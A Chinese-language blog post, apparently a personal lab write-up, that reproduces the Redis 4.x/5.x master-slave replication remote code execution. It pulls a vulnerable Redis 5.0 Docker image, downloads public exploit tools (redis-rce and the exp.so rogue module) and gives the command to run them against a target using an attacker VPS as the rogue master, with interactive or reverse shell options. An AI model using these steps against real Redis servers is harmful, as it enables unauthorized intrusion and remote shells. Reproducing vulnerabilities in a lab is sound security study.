Redis基于主从复制的RCE 4.x/5.x 复现
0x00 前言
最近期末考试,博客好久没有更新了,这段时间爆了三四个洞,趁着还没去实习,抓紧复现一下,这次复现的是Redis的RCE,复现过程中也遇到很多问题,记录下来和大家分享一下
0x01 拉取镜像
docker确实是个好东西,有了它复现节省不少时间,首先拉取一个5.0镜像
docker search redis5.0 //查找镜像
docker pull damonevking/redis5.0 //拉取下图第三个镜像
0x02 运行环境
运行容器
docker run -p 6379:6379 -d damonevking/redis5.0 redis-server //映射端口并运行容器
访问:你的ip:6379,如下图则搭建成功
0x03 漏洞利用
git clone https://github.com/Ridter/redis-rce.git //下载漏洞利用脚本
注意,这里少一个.so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下载并放到和redis-rce.py同一目录下
python3 redis-rce.py -r 136.244.70.243(目标ip) -L 136.244.70.243(自己的vps) -f exp.so //ip就不打码了,师傅们不要搞我
在此处:i为交互式shell,r为反弹shell,根据自己的需要选择就可以了
参考链接:
https://github.com/Ridter/redis-rce
https://github.com/n0b0dyCN/redis-rogue-server
https://www.cnblogs.com/mrhonest/p/11162735.html